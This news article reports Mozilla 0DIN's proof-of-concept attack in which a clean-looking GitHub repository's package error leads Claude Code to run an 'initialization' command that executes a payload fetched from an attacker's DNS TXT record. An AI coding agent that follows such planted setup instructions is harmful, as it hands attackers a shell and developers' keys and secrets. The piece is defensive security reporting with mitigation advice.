Mozilla Warns Clean GitHub Repositories Can Trick Claude Code Into Running Malware

Mozilla’s Zero Day Investigative Network (0DIN) has demonstrated a new attack technique that could allow seemingly harmless GitHub repositories to compromise developers using AI-powered coding assistants such as Claude Code.

According to the researchers, the attack does not rely on obvious exploit code, suspicious shell commands, or other warning signs that would normally attract the attention of security tools or code reviewers. Instead, it abuses the way agentic coding tools automatically troubleshoot project setup issues.

How the attack works

The proof-of-concept begins with a clean-looking GitHub repository that includes normal setup instructions, such as installing dependencies and initializing the project.

A specially crafted Python package intentionally refuses to run until it has been initialized. Instead of executing, it displays an error instructing the user to run an initialization command.

Mozilla’s researchers found that Claude Code can interpret the message as a routine setup issue and automatically execute the recommended command while attempting to fix the problem.

That initialization command launches a shell script that retrieves a configuration value stored inside an attacker-controlled DNS TXT record. Rather than containing malicious code inside the repository itself, the fetched DNS value is executed as a command, allowing the payload to remain hidden from many traditional scanning methods.

Hidden payload increases the risk

The researchers say the AI agent effectively automates the entire attack chain, with each step appearing to be part of a normal software installation process.

If successful, the attacker gains an interactive shell running with the developer’s user privileges. That level of access could expose sensitive information such as environment variables, API keys, local configuration files, and other developer credentials and secrets.

Because the malicious payload is retrieved dynamically from DNS instead of being stored in the repository, reviewers and automated security scanners may not detect anything suspicious during code inspection.

Developers urged to verify setup commands

Mozilla warns that attackers could distribute repositories using this technique through fake job offers, online tutorials, blog posts, or direct messages targeting developers.

To reduce the risk, 0DIN recommends that AI coding agents clearly display the complete execution chain before running setup commands, including any scripts and code that are fetched dynamically during runtime. Giving developers full visibility into every step would make it easier to identify unexpected behavior before code is executed.

In other security news, a malicious Microsoft Edge extension has recently been used to deploy a Python backdoor, while a separate WhatsApp malware campaign has targeted businesses.

Via BleepingComputer